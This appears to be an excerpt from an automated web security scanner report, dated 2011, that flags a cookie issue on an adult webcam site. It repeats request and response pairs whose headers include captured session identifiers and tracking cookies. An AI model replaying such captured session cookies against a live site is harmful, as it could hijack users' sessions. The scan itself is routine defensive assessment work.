HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:42 GMT Connection: close Content-Length: 33116 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/caught-on-cam/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:21 GMT Connection: close Content-Length: 25588 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:30 GMT Connection: close Content-Length: 110732 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/fetish/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:51 GMT Connection: close Content-Length: 212158 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/fetish/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:44 GMT Connection: close Content-Length: 24479 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:53 GMT Connection: close Content-Length: 72506 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/free-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoidMay82O9Ww8iIgmnpOkaYYd%2bRloG%2b4CAmxrVQ%2bGzRheecUYgUyCFOOp2ODZpcVY%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:47 GMT Connection: close Content-Length: 51624 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/gay-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:18 GMT Connection: close Content-Length: 33498 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/gay/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:55 GMT Connection: close Content-Length: 194997 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/guy-alone/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:44 GMT Connection: close Content-Length: 69731 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/happyhour/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:55 GMT Connection: close Content-Length: 22310 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/lesbian-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:23 GMT Connection: close Content-Length: 118643 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
